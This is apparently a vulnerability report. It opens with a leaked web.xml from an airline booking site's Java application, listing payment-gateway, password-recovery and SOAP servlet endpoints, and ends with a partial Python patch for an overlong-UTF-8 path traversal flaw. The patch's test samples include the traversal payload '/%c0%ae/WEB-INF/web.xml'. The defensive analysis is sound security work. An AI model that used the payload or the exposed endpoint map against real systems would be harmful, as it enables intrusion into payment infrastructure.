<servlet-name>CheckImageServlet</servlet-name>
<servlet-class>com.iss.szair.common.servlet.CheckImageServlet</servlet-class>
</servlet>
<!-- Postal Savings payment processing servlet, add by SunC -->
<servlet id="Servlet_1282032627904">
<servlet-name>PSBCB2CServlet</servlet-name>
<servlet-class>com.iss.szair.bank.psbc.PSBCB2CServlet</servlet-class>
</servlet>
<!--
ADD By li-jun-neu 20140126 NEB-93 B2C uses the payment platform interface Start
-->
<servlet id="Servlet_6455259">
<servlet-name>PaymentServlet</servlet-name>
<servlet-class>
com.iss.scm.returnbill.payment.servlet.PaymentPlantServlet
</servlet-class>
</servlet>
<!-- ADD By li-jun-neu 20140126 NEB-93 B2C uses the payment platform interface End -->
<!-- pujian payinterface -->
<servlet id="Servlet_6455257">
<servlet-name>PaymentGuoNeiPlantServlet</servlet-name>
<servlet-class>
com.iss.szair.b2c.payinterface.payment.servlet.PaymentGuoNeiPlantServlet
</servlet-class>
</servlet>
<servlet id="Servlet_6455258">
<servlet-name>PaymentGuoNeiPlantNotifyServlet</servlet-name>
<servlet-class>
com.iss.szair.b2c.payinterface.payment.servlet.PaymentGuoNeiPlantNotifyServlet
</servlet-class>
</servlet>
<servlet id="Servlet_64552590">
<servlet-name>NewAPINotifyServlet</servlet-name>
<servlet-class>
com.iss.szair.b2c.payinterface.payment.servlet.NewAPINotifyServlet
</servlet-class>
</servlet>
<servlet id="Servlet_6455255">
<servlet-name>PaymentPlantServlet</servlet-name>
<servlet-class>
com.iss.szair.b2c.internationalBooking.payment.servlet.PaymentPlantServlet
</servlet-class>
</servlet>
<servlet id="Servlet_6455256">
<servlet-name>PaymentPlantNotifyServlet</servlet-name>
<servlet-class>
com.iss.szair.b2c.internationalBooking.payment.servlet.PaymentPlantNotifyServlet
</servlet-class>
</servlet>
<!--
ADD By zhangchunyu 20140825 NEB-544 B2C system ticket verification feature: add validity checks and query limits Start
-->
<servlet id="Servlet_1282032627905">
<servlet-name>RandomImgServlet</servlet-name>
<servlet-class>com.iss.szair.common.servlet.RandomImgServlet</servlet-class>
</servlet>
<!--
ADD By zhangchunyu 20140825 NEB-544 B2C system ticket verification feature: add validity checks and query limits END
-->
<servlet id="Servlet_1282032627998">
<servlet-name>CheckImageServlet3D</servlet-name>
<servlet-class>com.iss.szair.common.servlet.CheckImageServlet3D</servlet-class>
</servlet>
<servlet id="Servlet_1282032627907">
<servlet-name>CheckImageServlet3DNew</servlet-name>
<servlet-class>
com.iss.szair.common.servlet.CheckImageServlet3DNew
</servlet-class>
</servlet>
<servlet id="Servlet_1282032627909">
<servlet-name>InterCheckImageServlet3D</servlet-name>
<servlet-class>
com.iss.szair.b2c.internationalBooking.common.InterCheckImageServlet3D
</servlet-class>
</servlet>
<servlet id="Servlet_1282032627911">
<servlet-name>SavePriceServlet</servlet-name>
<servlet-class>com.iss.szair.common.servlet.SavePriceServlet</servlet-class>
</servlet>
<!-- add by yudx 20141204 neb-536 official website UIUIE quick payment start -->
<servlet id="Servlet_64552591">
<servlet-name>PaymentUiueNotifyServlet</servlet-name>
<servlet-class>
com.iss.szair.b2c.uiue.servlet.PaymentUiueNotifyServlet
</servlet-class>
</servlet>
<servlet id="Servlet_64552601">
<servlet-name>PaymentUiueReturnServlet</servlet-name>
<servlet-class>
com.iss.szair.b2c.uiue.servlet.PaymentUiueReturnServlet
</servlet-class>
</servlet>
<!-- add by yudx 20141204 neb-536 official website UIUIE quick payment end -->
<servlet-mapping id="ServletMapping_savePriceServlet">
<servlet-name>SavePriceServlet</servlet-name>
<url-pattern>/servlet/SavePrice</url-pattern>
</servlet-mapping>
<!-- add by yudx 20141204 neb-536 official website UIUIE quick payment start -->
<servlet-mapping id="ServletMapping_64552591">
<servlet-name>PaymentUiueNotifyServlet</servlet-name>
<url-pattern>/servlet/PaymentUiueNotifyServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_64552601">
<servlet-name>PaymentUiueReturnServlet</servlet-name>
<url-pattern>/servlet/PaymentUiueReturnServlet</url-pattern>
</servlet-mapping>
<!-- add by yudx 20141204 neb-536 official website UIUIE quick payment end -->
<servlet-mapping id="ServletMapping_interImage3D">
<servlet-name>InterCheckImageServlet3D</servlet-name>
<url-pattern>/servlet/InterCheckImageServlet3D</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_image3D">
<servlet-name>CheckImageServlet3D</servlet-name>
<url-pattern>/servlet/CheckImageServlet3D</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_image3DNew">
<servlet-name>CheckImageServlet3DNew</servlet-name>
<url-pattern>/servlet/CheckImageServlet3DNew</url-pattern>
</servlet-mapping>
<!--
ADD By zhangchunyu 20140825 NEB-544 B2C system ticket verification feature: add validity checks and query limits Start
-->
<servlet-mapping id="ServletMapping_1233884491919">
<servlet-name>RandomImgServlet</servlet-name>
<url-pattern>/servlet/RandomImgServlet</url-pattern>
</servlet-mapping>
<!--
ADD By zhangchunyu 20140825 NEB-544 B2C system ticket verification feature: add validity checks and query limits End
-->
<servlet-mapping id="ServletMapping_6455255">
<servlet-name>PaymentPlantServlet</servlet-name>
<url-pattern>/servlet/PaymentPlantServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_6455256">
<servlet-name>PaymentPlantNotifyServlet</servlet-name>
<url-pattern>/servlet/PaymentPlantNotifyServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_64552590">
<servlet-name>NewAPINotifyServlet</servlet-name>
<url-pattern>/servlet/NewAPINotifyServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_6455257">
<servlet-name>PaymentGuoNeiPlantServlet</servlet-name>
<url-pattern>/servlet/PaymentGuoNeiPlantServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_6455258">
<servlet-name>PaymentGuoNeiPlantNotifyServlet</servlet-name>
<url-pattern>/servlet/PaymentGuoNeiPlantNotifyServlet</url-pattern>
</servlet-mapping>
<!-- pujian payinterface -->
<!--
ADD By li-jun-neu 20140126 NEB-93 B2C uses the payment platform interface Start
-->
<servlet-mapping id="ServletMapping_6455259">
<servlet-name>PaymentServlet</servlet-name>
<url-pattern>/servlet/PaymentServlet</url-pattern>
</servlet-mapping>
<!-- ADD By li-jun-neu 20140126 NEB-93 B2C uses the payment platform interface End -->
<servlet-mapping id="ServletMapping_image">
<servlet-name>CheckImageServlet</servlet-name>
<url-pattern>/servlet/CheckImageServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1282032712510">
<servlet-name>TejiaMailBookServlet</servlet-name>
<url-pattern>/servlet/TejiaMailBookServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491878">
<servlet-name>BarcodeServlet</servlet-name>
<url-pattern>/gensvg</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_9082011072202">
<servlet-name>FindPasswordServlet</servlet-name>
<url-pattern>/servlet/findServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_9282011072202">
<servlet-name>ValidateUserServlet</servlet-name>
<url-pattern>/servlet/userServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491879">
<servlet-name>BarcodeServlet</servlet-name>
<url-pattern>/genbc</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1243957877209">
<servlet-name>GZUNIONB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.gzunion.GZUNIONB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1282032712511">
<servlet-name>QuickMoneyB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.quickmpay.QuickMoneyB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1282032712599">
<servlet-name>QuickMoneyCCServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.quickmpay.cc.QuickMoneyCCServlet
</url-pattern>
</servlet-mapping>
<!-- add by xingjg NEB-80 - social check-in start -->
<servlet-mapping id="ServletMapping_1282032712580">
<servlet-name>PlatformLoginServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.b2c.checkin.platform.LoginServlet
</url-pattern>
</servlet-mapping>
<!-- add by xingjg NEB-80 - social check-in end -->
<servlet-mapping id="ServletMapping_1337167924177">
<servlet-name>WyzxB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.wyzxen.WyzxB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1282032712512">
<servlet-name>BOCOMB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.bocom.BOCOMB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491880">
<servlet-name>BarcodeErrorServlet</servlet-name>
<url-pattern>/errsvg</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491882">
<servlet-name>BankPayServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.BankPayServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491883">
<servlet-name>WapBankPayServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.WapBankPayServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491884">
<servlet-name>ABCB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.abc.ABCB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491913">
<servlet-name>EPosPayServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.yeepay.epos.EPosPayServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491885">
<servlet-name>AliPayB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.alipay.AliPayB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1243957877210">
<servlet-name>AliPayB2CServlet1</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.alipay.AliPayB2CServlet1
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491886">
<servlet-name>CCBB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.ccb.CCBB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491887">
<servlet-name>CCBWapB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.ccb.CCBWapB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491888">
<servlet-name>BCB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.bc.BCB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491889">
<servlet-name>CMBB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.cmb.CMBB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491890">
<servlet-name>CHINAPNRB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491891">
<servlet-name>CHINAPNRB2CServlet1</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.chinapnr.CHINAPNRB2CServlet1
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491892">
<servlet-name>CHINAPNRMASB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.chinapnr.CHINAPNRMASB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491893">
<servlet-name>CHINAPNRMASB2CRefundServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.chinapnr.CHINAPNRMASB2CRefundServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491894">
<servlet-name>ICBCB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.icbc.ICBCB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491895">
<servlet-name>SDBB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.sdb.SDBB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491896">
<servlet-name>SZSHPDB2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.spdb.SZSHPDB2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491897">
<servlet-name>SZUnionServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.szunion.SZUNIONB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491898">
<servlet-name>YeePay2CServlet</servlet-name>
<url-pattern>/servlet/com.iss.szair.bank.yeepay.YeePay2CServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491899">
<servlet-name>TenPayB2CServlet</servlet-name>
<url-pattern>
/servlet/com.iss.szair.bank.tenpay.TenPayB2CServlet
</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491900">
<servlet-name>AjaxServlet</servlet-name>
<url-pattern>/com.shenzhenair.shem.gift.checkCardServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491901">
<servlet-name>action</servlet-name>
<url-pattern>*.do</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491902">
<servlet-name>SelectCityServlet</servlet-name>
<url-pattern>/servlet/SelectCityServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491903">
<servlet-name>CrmScoreServlet</servlet-name>
<url-pattern>/servlet/CrmScoreServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491904">
<servlet-name>ChineseWordServlet</servlet-name>
<url-pattern>/servlet/ChineseWordServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491905">
<servlet-name>AxisServlet</servlet-name>
<url-pattern>/servlet/AxisServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491906">
<servlet-name>AxisServlet</servlet-name>
<url-pattern>*.jws</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491907">
<servlet-name>AxisServlet</servlet-name>
<url-pattern>/services/*</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491908">
<servlet-name>SOAPMonitorService</servlet-name>
<url-pattern>/SOAPMonitor</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491909">
<servlet-name>Barbecue</servlet-name>
<url-pattern>/barbecue/barcode</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491910">
<servlet-name>dwr-invoker</servlet-name>
<url-pattern>/dwr/*</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491911">
<servlet-name>SearchEngineServlet</servlet-name>
<url-pattern>/servlet/SearchEngineServlet</url-pattern>
</servlet-mapping>
<servlet-mapping id="ServletMapping_1233884491912">
<servlet-name>PSBCB2CServlet</servlet-name>
<url-pattern>/servlet/PSBCB2CServlet</url-pattern>
</servlet-mapping>
<session-config id="SessionConfig_1233884491878">
<session-timeout>45</session-timeout>
</session-config>
<mime-mapping id="MimeMapping_1154677298328">
<extension>abs</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1233884491878">
<extension>xsl</extension>
<mime-type>text/xml</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298329">
<extension>ai</extension>
<mime-type>application/postscript</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298330">
<extension>aif</extension>
<mime-type>audio/x-aiff</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298331">
<extension>aifc</extension>
<mime-type>audio/x-aiff</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298332">
<extension>aiff</extension>
<mime-type>audio/x-aiff</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298333">
<extension>aim</extension>
<mime-type>application/x-aim</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298334">
<extension>art</extension>
<mime-type>image/x-jg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298335">
<extension>asf</extension>
<mime-type>video/x-ms-asf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298336">
<extension>asx</extension>
<mime-type>video/x-ms-asf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298337">
<extension>au</extension>
<mime-type>audio/basic</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298338">
<extension>avi</extension>
<mime-type>video/x-msvideo</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298339">
<extension>avx</extension>
<mime-type>video/x-rad-screenplay</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298340">
<extension>bcpio</extension>
<mime-type>application/x-bcpio</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298341">
<extension>bin</extension>
<mime-type>application/octet-stream</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298342">
<extension>bmp</extension>
<mime-type>image/bmp</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298343">
<extension>body</extension>
<mime-type>text/html</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298344">
<extension>cdf</extension>
<mime-type>application/x-cdf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298345">
<extension>cer</extension>
<mime-type>application/x-x509-ca-cert</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298346">
<extension>title</extension>
<mime-type>application/java</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298347">
<extension>cpio</extension>
<mime-type>application/x-cpio</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298348">
<extension>csh</extension>
<mime-type>application/x-csh</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298349">
<extension>css</extension>
<mime-type>text/css</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298359">
<extension>dib</extension>
<mime-type>image/bmp</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298360">
<extension>doc</extension>
<mime-type>application/msword</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298361">
<extension>ppt</extension>
<mime-type>application/ppt</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298362">
<extension>mht</extension>
<mime-type>text/x-mht</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298363">
<extension>xls</extension>
<mime-type>application/msexcel</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298364">
<extension>dtd</extension>
<mime-type>text/plain</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298365">
<extension>dv</extension>
<mime-type>video/x-dv</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298366">
<extension>dvi</extension>
<mime-type>application/x-dvi</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298367">
<extension>eps</extension>
<mime-type>application/postscript</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298368">
<extension>etx</extension>
<mime-type>text/x-setext</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298369">
<extension>exe</extension>
<mime-type>application/octet-stream</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298370">
<extension>gif</extension>
<mime-type>image/gif</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298371">
<extension>gtar</extension>
<mime-type>application/x-gtar</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298372">
<extension>gz</extension>
<mime-type>application/x-gzip</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298373">
<extension>hdf</extension>
<mime-type>application/x-hdf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298374">
<extension>hqx</extension>
<mime-type>application/mac-binhex40</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298375">
<extension>htc</extension>
<mime-type>text/x-component</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298376">
<extension>htm</extension>
<mime-type>text/html</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298377">
<extension>html</extension>
<mime-type>text/html</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298378">
<extension>hqx</extension>
<mime-type>application/mac-binhex40</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298379">
<extension>ief</extension>
<mime-type>image/ief</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298380">
<extension>jad</extension>
<mime-type>text/vnd.sun.j2me.app-descriptor</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298381">
<extension>jar</extension>
<mime-type>application/java-archive</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298382">
<extension>java</extension>
<mime-type>text/plain</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298383">
<extension>jnlp</extension>
<mime-type>application/x-java-jnlp-file</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298384">
<extension>jpe</extension>
<mime-type>image/jpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298385">
<extension>jpeg</extension>
<mime-type>image/jpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298386">
<extension>jpg</extension>
<mime-type>image/jpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298387">
<extension>js</extension>
<mime-type>text/javascript</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298388">
<extension>jsf</extension>
<mime-type>text/plain</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298389">
<extension>jspf</extension>
<mime-type>text/plain</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298390">
<extension>kar</extension>
<mime-type>audio/x-midi</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298391">
<extension>latex</extension>
<mime-type>application/x-latex</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298392">
<extension>m3u</extension>
<mime-type>audio/x-mpegurl</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298393">
<extension>mac</extension>
<mime-type>image/x-macpaint</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298394">
<extension>man</extension>
<mime-type>application/x-troff-man</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298395">
<extension>me</extension>
<mime-type>application/x-troff-me</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298396">
<extension>mid</extension>
<mime-type>audio/x-midi</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298397">
<extension>midi</extension>
<mime-type>audio/x-midi</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298398">
<extension>mif</extension>
<mime-type>application/x-mif</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298399">
<extension>mov</extension>
<mime-type>video/quicktime</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298400">
<extension>movie</extension>
<mime-type>video/x-sgi-movie</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298401">
<extension>mp1</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298402">
<extension>mp2</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298403">
<extension>mp3</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298404">
<extension>mpa</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298405">
<extension>mpe</extension>
<mime-type>video/mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298406">
<extension>mpeg</extension>
<mime-type>video/mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298407">
<extension>mpega</extension>
<mime-type>audio/x-mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298408">
<extension>mpg</extension>
<mime-type>video/mpeg</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298409">
<extension>mpv2</extension>
<mime-type>video/mpeg2</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298410">
<extension>ms</extension>
<mime-type>application/x-wais-source</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298411">
<extension>nc</extension>
<mime-type>application/x-netcdf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298412">
<extension>oda</extension>
<mime-type>application/oda</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298413">
<extension>pbm</extension>
<mime-type>image/x-portable-bitmap</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298414">
<extension>pct</extension>
<mime-type>image/pict</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298415">
<extension>pdf</extension>
<mime-type>application/pdf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298416">
<extension>pgm</extension>
<mime-type>image/x-portable-graymap</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298417">
<extension>pic</extension>
<mime-type>image/pict</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298418">
<extension>pict</extension>
<mime-type>image/pict</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298419">
<extension>pls</extension>
<mime-type>audio/x-scpls</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298420">
<extension>png</extension>
<mime-type>image/png</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298421">
<extension>pnm</extension>
<mime-type>image/x-portable-anymap</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298422">
<extension>pnt</extension>
<mime-type>image/x-macpaint</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298423">
<extension>ppm</extension>
<mime-type>image/x-portable-pixmap</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298424">
<extension>ps</extension>
<mime-type>application/postscript</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298425">
<extension>psd</extension>
<mime-type>image/x-photoshop</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298426">
<extension>qt</extension>
<mime-type>video/quicktime</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298427">
<extension>qti</extension>
<mime-type>image/x-quicktime</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298428">
<extension>qtif</extension>
<mime-type>image/x-quicktime</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298429">
<extension>rar</extension>
<mime-type>application/x-rar-compressed</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298430">
<extension>ras</extension>
<mime-type>image/x-cmu-raster</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298431">
<extension>rgb</extension>
<mime-type>image/x-rgb</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298432">
<extension>rm</extension>
<mime-type>application/vnd.rn-realmedia</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298433">
<extension>roff</extension>
<mime-type>application/x-troff</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298434">
<extension>rtf</extension>
<mime-type>application/rtf</mime-type>
</mime-mapping>
<mime-mapping id="MimeMapping_1154677298435">

 

Fix:

# Patch
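
What a patch for this class of bug has to enforce, as an added example that is not part of the original report or the vendor's code: `flawed_resolve` is a simplified, assumed model of a container that checks access on the raw path and decodes leniently afterwards, and `hardened_resolve` decodes strictly, normalizes, and only then checks access. All function names and sample paths other than the reported `%c0%ae` request are constructed for illustration.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Directories a servlet container must never serve to clients.
PROTECTED = ("/web-inf", "/meta-inf")


def lenient_decode(raw: bytes) -> str:
    """Model of a non-validating decoder that accepts overlong 2-byte UTF-8."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and (raw[i + 1] & 0xC0) == 0x80:
            # No minimum-value check, so 0xC0 0xAE becomes U+002E ('.').
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def is_protected(path: str) -> bool:
    """True if the normalized path is, or lies under, a protected directory."""
    norm = "/" + posixpath.normpath(path).lstrip("/").lower()
    return any(norm == p or norm.startswith(p + "/") for p in PROTECTED)


def flawed_resolve(raw_path: str):
    """Flawed order (assumed model): check the raw path, decode leniently later."""
    if is_protected(raw_path):
        return ("reject", "protected directory")
    decoded = lenient_decode(unquote_to_bytes(raw_path))
    return ("serve", posixpath.normpath(decoded))


def hardened_resolve(raw_path: str):
    """Strict decode first, then normalize, then run the access check."""
    try:
        decoded = unquote_to_bytes(raw_path).decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        # Strict UTF-8 forbids lead bytes 0xC0/0xC1: they are always overlong.
        return ("reject", "malformed or overlong UTF-8")
    if "\x00" in decoded:
        return ("reject", "NUL byte in path")
    if is_protected(decoded):
        return ("reject", "protected directory")
    return ("serve", posixpath.normpath(decoded))


if __name__ == "__main__":
    samples = [
        "/%c0%ae/WEB-INF/web.xml",   # request path from the report
        "/%2e/WEB-INF/web.xml",      # constructed: valid encoding of '.'
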